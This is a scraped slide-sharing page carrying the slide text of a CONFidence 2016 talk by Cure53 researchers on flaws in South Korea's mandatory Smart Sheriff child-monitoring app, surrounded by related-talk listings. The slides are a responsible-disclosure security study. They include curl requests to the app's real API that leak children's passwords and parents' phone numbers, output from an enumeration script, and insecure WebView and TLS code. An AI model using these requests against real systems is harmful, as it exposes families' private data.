[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
 
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz][4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
 
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
 
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
 
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
 
[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)
 
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
 
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
 

Similar to [CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea. The wild west of government assisted parenting

Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber SecurityAyoma Wijethunga
 
All your family secrets belong to us—Worrisome security issues in tracker apps
All your family secrets belong to us—Worrisome security issues in tracker appsAll your family secrets belong to us—Worrisome security issues in tracker apps
All your family secrets belong to us—Worrisome security issues in tracker appsPriyanka Aash
 
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)modeelf
 
Our Data Ourselves, Pydata 2015
Our Data Ourselves, Pydata 2015Our Data Ourselves, Pydata 2015
Our Data Ourselves, Pydata 2015kingsBSD
 
Jorden Lentze - Related Worlds - Conversion Hotel 2015
Jorden Lentze - Related Worlds - Conversion Hotel 2015Jorden Lentze - Related Worlds - Conversion Hotel 2015
Jorden Lentze - Related Worlds - Conversion Hotel 2015Webanalisten .nl
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
 
Mobile Securty - An Oxymoron?
Mobile Securty - An Oxymoron?Mobile Securty - An Oxymoron?
Mobile Securty - An Oxymoron?morisson
 
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...Allison Miller
 
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinRv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinreconvillage
 
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...RootedCON
 
SplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunk
 
Web3 + scams = It's a match
Web3 + scams = It's a matchWeb3 + scams = It's a match
Web3 + scams = It's a matchZoltan Balazs
 
2 Conferences in 1 hour
2 Conferences in 1 hour2 Conferences in 1 hour
2 Conferences in 1 hourIan Forrester
 
Why should you do a pentest?
Why should you do a pentest?Why should you do a pentest?
Why should you do a pentest?Abraham Aranguren
 
Philippines Cybersecurity Conference 2021: The role of CERTs
Philippines Cybersecurity Conference 2021: The role of CERTsPhilippines Cybersecurity Conference 2021: The role of CERTs
Philippines Cybersecurity Conference 2021: The role of CERTsAPNIC
 
SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...
SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...
SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...Distilled
 
Google Will Not Go Gentle into That Good Night: Project Glass
Google Will Not Go Gentle into That Good Night: Project GlassGoogle Will Not Go Gentle into That Good Night: Project Glass
Google Will Not Go Gentle into That Good Night: Project GlassBill Slawski
 
Civic Commons: NAGW 2011 Lightning Round
Civic Commons: NAGW 2011 Lightning RoundCivic Commons: NAGW 2011 Lightning Round
Civic Commons: NAGW 2011 Lightning Roundcivcoms
 

Similar to [CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea. The wild west of government assisted parenting (20)

Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber Security
 
All your family secrets belong to us—Worrisome security issues in tracker apps
All your family secrets belong to us—Worrisome security issues in tracker appsAll your family secrets belong to us—Worrisome security issues in tracker apps
All your family secrets belong to us—Worrisome security issues in tracker apps
 
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
 
Our Data Ourselves, Pydata 2015
Our Data Ourselves, Pydata 2015Our Data Ourselves, Pydata 2015
Our Data Ourselves, Pydata 2015
 
Cyber safety
Cyber safetyCyber safety
Cyber safety
 
Jorden Lentze - Related Worlds - Conversion Hotel 2015
Jorden Lentze - Related Worlds - Conversion Hotel 2015Jorden Lentze - Related Worlds - Conversion Hotel 2015
Jorden Lentze - Related Worlds - Conversion Hotel 2015
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 
Mobile Securty - An Oxymoron?
Mobile Securty - An Oxymoron?Mobile Securty - An Oxymoron?
Mobile Securty - An Oxymoron?
 
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...
2012.09 A Million Mousetraps: Using Big Data and Little Loops to Build Better...
 
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinRv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
 
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...
Francisco Jesús Gómez & Carlos Juan Diaz - Sinfonier: Storm Builder for Secur...
 
SplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud Detection
 
Web3 + scams = It's a match
Web3 + scams = It's a matchWeb3 + scams = It's a match
Web3 + scams = It's a match
 
2 Conferences in 1 hour
2 Conferences in 1 hour2 Conferences in 1 hour
2 Conferences in 1 hour
 
Why should you do a pentest?
Why should you do a pentest?Why should you do a pentest?
Why should you do a pentest?
 
Philippines Cybersecurity Conference 2021: The role of CERTs
Philippines Cybersecurity Conference 2021: The role of CERTsPhilippines Cybersecurity Conference 2021: The role of CERTs
Philippines Cybersecurity Conference 2021: The role of CERTs
 
SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...
SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...
SearchLove Boston 2016 | Emily Grossman | Mobile Jedi Mind Tricks: Master the...
 
Google Will Not Go Gentle into That Good Night: Project Glass
Google Will Not Go Gentle into That Good Night: Project GlassGoogle Will Not Go Gentle into That Good Night: Project Glass
Google Will Not Go Gentle into That Good Night: Project Glass
 
Civic Commons: NAGW 2011 Lightning Round
Civic Commons: NAGW 2011 Lightning RoundCivic Commons: NAGW 2011 Lightning Round
Civic Commons: NAGW 2011 Lightning Round
 

Recently uploaded

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 

Recently uploaded (20)

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 

[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea. The wild west of government assisted parenting

  • 3. Smart Sheriff, Dumb Idea The wild west of government assisted parenting presented by: Abraham Aranguren - @7a_ Fabian Fäßler - @Samuirai
  • 4. We talk about an app • Background Information • Smart Sheriff - 1. Pentest Round • Smart Sheriff - 2. Pentest Round • Results • Smart Dream • Future work „In the end we hope you share our disbelieve“
  • 5. Who are we? Abraham Aranguren (@7a_) - blog.7-a.org OWASP OWTF Project leader - owtf.org abraham@cure53.de Fabian Fäßler (@samuirai) - smrrd.de fabian@cure53.de Cure53 is led by handsome Mario Heiderich (@0x6D6172696F). Bullshit free pentests, sometimes public  https://cure53.de/#publications
  • 6. Once upon a time… … in a country far far away.
  • 7. South Korea – Smartphone Usage % Total population % 18-34 y/o population Source: Spring 2015 Global Attitudes survey. Q71 & Q72. … the country with the highest Smartphone usage on the planet!
  • 8. South Korea – Child Protection Laws Article 32, Section 7 of Korean Telecommunications Business Act mobile network operators have to provide adult content filtering service for legal minors … Introduced 15.10.2014
  • 9. Article 32, Section 7 of Korean Telecommunications Business Act mobile network operators have to provide adult content filtering service for legal minors … Introduced 15.10.2014 Introduced 14.04.2015 Implementation Details Article 37, Section 8 Notify children and parents about features of the blocking Monthly notification if the blocking means was deleted or had not been operated for more than 15 days … South Korea – Child Protection Laws
  • 10. South Korea – Mandatory apps Mandatory installation of a surveilance app when the phone is purchased for a teenager.
  • 11. South Korea – Mandatory apps Mandatory installation of a surveilance app when the phone is purchased for a teenager. No opt-out.
  • 12. South Korea – Mandatory apps Photo: Lee Jin-man/Associated Press
  • 13. Mobile Internet Business Association (MOIBA) The Korean Communications Commission (KCC) gave MOIBA USD $2.7 million to create these mandatory apps
  • 14. Why did we do this? OpenNet Korea brought this to Citizen Lab http://opennetkorea.org/ Citizen Lab, Toronto "Citizen Lab Summer Institute on Monitoring Internet Openness and Rights 2015“ http://citizenlab.org/ Open Technology Fund supported it https://www.opentech.fund/
  • 15. MOIBA - Smart Sheriff / Smart Dream MOIBA created 2 mobile apps Smart Sheriff Smart Dream (Nightmare?) Scope Out of scope Smartphone usage restrictions. Block apps. Usage time restrictions. SMS/Chat and search monitoring for bad keywords. Security: why do you think are we here? Security: wait till the end
  • 16. Smart Sheriff: Parent vs. Child mode Parent Child • Operating mode chosen on first usage • Parent-Mode: Smartphone usage management • Child-Mode: For filtering and activity monitoring
  • 17. Smart Sheriff: Block phone access Parents can deny phone access for certain times for the child
  • 18. Smart Sheriff: Installed apps See installed apps on child’s phone and deny or enable access to them.
  • 19. Round 1 – Preparations
  • 21. Language Barrier unpack, translate, repack with apktool http://ibotpeaches.github.io/Apktool/
  • 22. Language Barrier unpack, translate, repack with apktool http://ibotpeaches.github.io/Apktool/
  • 24. move-result-object v0 const-string v1, "SAMU" invoke-static {v1, v0}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I private static final String TAG = "SAMU"; Log.i(TAG, result); Patching debug messages in smali code for easy debugging Debugging Need opcodes? http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
  • 25. Round 1 – Shoot
  • 26. String url = "http://ssweb.moiba.or.kr/pushAlarm"; WebView webview = (WebView)findViewById(0x7f070000); webview.getSettings().setJavaScriptEnabled(true); webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff"); webview.postUrl(url, obj); var String = window.jsinterface.getSomeString(); // window.jsinterface.getClass().forName('java.lang.Runtime') RCE with insecure WebView Accessing Java methods from JavaScript in Android 2.4 to 4.1 SMS-01-001 https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614 https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
  • 27. String url = "http://ssweb.moiba.or.kr/pushAlarm"; WebView webview = (WebView)findViewById(0x7f070000); webview.getSettings().setJavaScriptEnabled(true); webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff"); webview.postUrl(url, obj); What is SSL? SMS-01-003
  • 28. String url = "http://ssweb.moiba.or.kr/pushAlarm"; WebView webview = (WebView)findViewById(0x7f070000); webview.getSettings().setJavaScriptEnabled(true); webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff"); webview.postUrl(url, obj); What is SSL? SMS-01-003
  • 34. Smart Sheriff – Bully API SMS-01-018 API
  • 35. Smart Sheriff – Bully API SMS-01-018 API
  • 36. Smart Sheriff – Bully API SMS-01-018 API
  • 37. Smart Sheriff – Bully API SMS-01-018 API
  • 38. Smart Sheriff – Bully API SMS-01-018 API API response with the password (XORed)
  • 39. Smart Sheriff – Bully API - Pass Leak SMS-01-018 root@redstar-os $ curl -v -s 'http://api.moiba.or.kr/MessageRequest --data '{ "action":"CLT_MBR_GETCLIENTMEMBERINFO", "MOBILE_MACHINE_INFO":"XXX", "MOBILE":"5ZWSVAA5[", "DEVICE_ID":"unknown" }' > POST /MessageRequest HTTP/1.1 > Host: api.moiba.or.kr > User-Agent: curl/7.48.0 > Accept: */* > Content-Length: 141 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 141 out of 141 bytes < HTTP/1.1 200 OK < Date: Sun, 15 Oct 2015 17:05:20 GMT < Server: Apache/2.0.65 (Unix) DAV/2 mod_jk/1.2.37 < Content-Length: 242 < Content-Type: text/plain; charset=euc-kr < {"CHILD_GRADE_TYPE":"","CHILD_BIR_YMD":"","MEMBER_YN":"Y","CHILD_BLCK_GRADE":"","PASSWORD":"2]" ,"PARENT_MOBILE":"5ZWSVAA5[","REGISTRATION_ID":"","DIVN":"PARENT"} 2] 1234 5ZWSVAA5[15555215652
  • 40. Smart Sheriff – Bully API SMS-01-018 Smart sheriff has so many users, you can find valid phone numbers by just trying random numbers. root@redstar-os $ python sheriff_raid.py CHILD : 010XXXXXXXX - pw: 0879 -> parent number: 010XXXXXXXX CHILD : 010XXXXXXXX - pw: 8493 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 8493 PARENT : 010XXXXXXXX - pw: 0878 CHILD : 010XXXXXXXX - pw: 0878 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 2580 CHILD : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX CHILD : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 5912 CHILD : 010XXXXXXXX - pw: 1004 -> parent number: 010XXXXXXXX PARENT : 010XXXXXXXX - pw: 1004
  • 41. Smart Sheriff – Bully API - Fake usage SMS-01-018 API No authentication for the child application. There is a DEVICE_ID as session cookie, but most API endpoints simply accept the phone number to perform updates.
  • 42. Why not? – HTTP Response for Login root@redstar-os $ curl -X POST http://ssweb.moiba.or.kr/main/ajaxLoginConfirm --data "PNAME=1234&LINKGBN=&PARENTNUM=0102222222" <script type="text/javascript"> function fn_goMain() { if ($("#LINKGBN").val() == "NOTICE") { $("#frmCont").attr("action","/board/boardList"); } else { $("#frmCont").attr("action","/main/childList"); } $("#frmCont").submit(); } // add by his function fn_goPasswordChange() { $("#frmCont").attr("action","/main/passwordChange"); $("#frmCont").submit(); } if('3' < 5){ alert('3회 비밀번호를 잘못 입력하셨습니다.n하단의 ‘비밀번호 찾기’를 클릭하세요.'); }else{ alert('비밀번호 5회 이상 오류로 로그인이 제한됩니다.n고객센터로 문의해주세요(1566-8274)'); } $("#PARENT").attr("disabled", false); $("#INPUTP").attr("disabled", false); </script> AJAX login response returns HTML <script> tag instead of JSON, XML, ... because … why not?
  • 43. Why not? – Tomcat 6.0.29 (released 2009)
  • 44. Why not? – Block websites function shouldOverrideUrlLoading()… if(s.startsWith("market://") || s.startsWith("tel:") || s.startsWith("http") && !s.contains("ssweb.moiba.or.kr")) SMS-01-002 blocked allowed :D http://blocked.com http://blocked.com/?blah=ssweb.moiba.or.kr
  • 45. Test and dev. snippets everywhere {"a1":"!@#$%^&*()_+","a2":"/","a3":"","a4":""","a5":"''''" ,"a6":"aaa한글 테스트 ....aaa"} http://api.moiba.or.kr/test/ http://api.moiba.or.kr/aaa/ http://api.moiba.or.kr/aaa2/ … Test URLs:
  • 46. Big pile of • XSS • Unsafe storage of block history on SD card • Leaking personal data over the API • SQL Injection in mobile app • … Seriously: https://cure53.de/pentest-report_smartsheriff.pdf
  • 47. CitizenLab approaches MOIBA • We gave our report to CitizenLab • CitizenLab was in contact with MOIBA • MOIBA made some legal threats in the beginning ⇒ Responsible Disclosure
  • 50. Citizen Lab publishes the report
  • 51. Some media attention … but reaction was a bit underwhelming
  • 52. „Thanks for the free pentest!“ It kinda backfired… Did we just help improving surveilance software?
  • 54. Fixed Stuff • SMS-01-002 Possible Filter-Bypass via unsafe URL check • SMS-01-003 No use of any SSL/TLS-based transport security • SMS-01-004 Test-Page leaks Data and App-Internals • SMS-01-008 Reflected XSS on ssweb.moiba.or.kr
  • 55. Smart Sheriff – How to SSL like a man SMS-02-008 public final void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler, SslError paramSslError) { paramSslErrorHandler.proceed(); } implements HostnameVerifier { public final boolean verify(String paramString, SSLSession paramSSLSession) { return true; }
  • 56. Smart Sheriff – Bully API v2.0 SMS-02-009 http://api.moiba.or.kr/MessageRequest https://api.moiba.or.kr/MessageRequest_New • New endpoint introduced • Old endpoint never deprecated – MOIBA lied
  • 59. Smart Sheriff – Bully API SMS-02-009 API Guess what happened using a different User Agent :D
  • 60. SMS-02-010 API No authentication for the child application. You can still fake the phone usage (kid installs p0rn app) Smart Sheriff – Bully API v2.0
  • 61. • They fixed what matters to them (Internal Dev Leaks) • They did not fix what affected their user (Information leaks, no authentication) Seriously: https://cure53.de/pentest-report_smartsheriff-2.pdf Round 2 - Summary
  • 62. Citizen Lab publishes updated report
  • 63. MOIBA reacts and pulls the app
  • 64. News about the app removal
  • 66. But something is shady…
  • 68. Find the difference! 사이버안심존 (Cyber Safety Zone) 스마트보안관 (Smart Sheriff)
  • 72. The new MOIBA – Login for Parents Smart Sheriff / Cyber Safety Zone Smart Dream
  • 73. Web Interface – Cyber Safety Zone
  • 74. Web Interface – Cyber Safety Zone
  • 75. Smart Sheriff / Cyber Safety Zone • MOIBA didn‘t deprecate the API • MOIBA renamed the app • MOIBA is trying to hide the issues But what is up with Smart Dream?
  • 76. Web Interface – Smart Dream
  • 77. Smart Dream Nightmare Parent Child • Parent-Mode: Check messages and searches containing dangerous words • Child-Mode: Monitoring SMS/KakaoTalk and google searches. installs as accessibility service
  • 78. Smart Dream Nightmare Parent App monitoring SMS Parent Web Backend
  • 79. Responsible Disclosure? • MOIBA lied to customers about security fixes. • Simply rebranding Smart Sheriff (still vulnerable) - And our reports are public • How can we protect the privacy of the children when MOIBA doesn‘t fix anything when disclosed in private? ⇒ We will not disclose technical details. Any research was done with our own test accounts.
  • 80. Smart Dream Nightmare XSS via stored messages
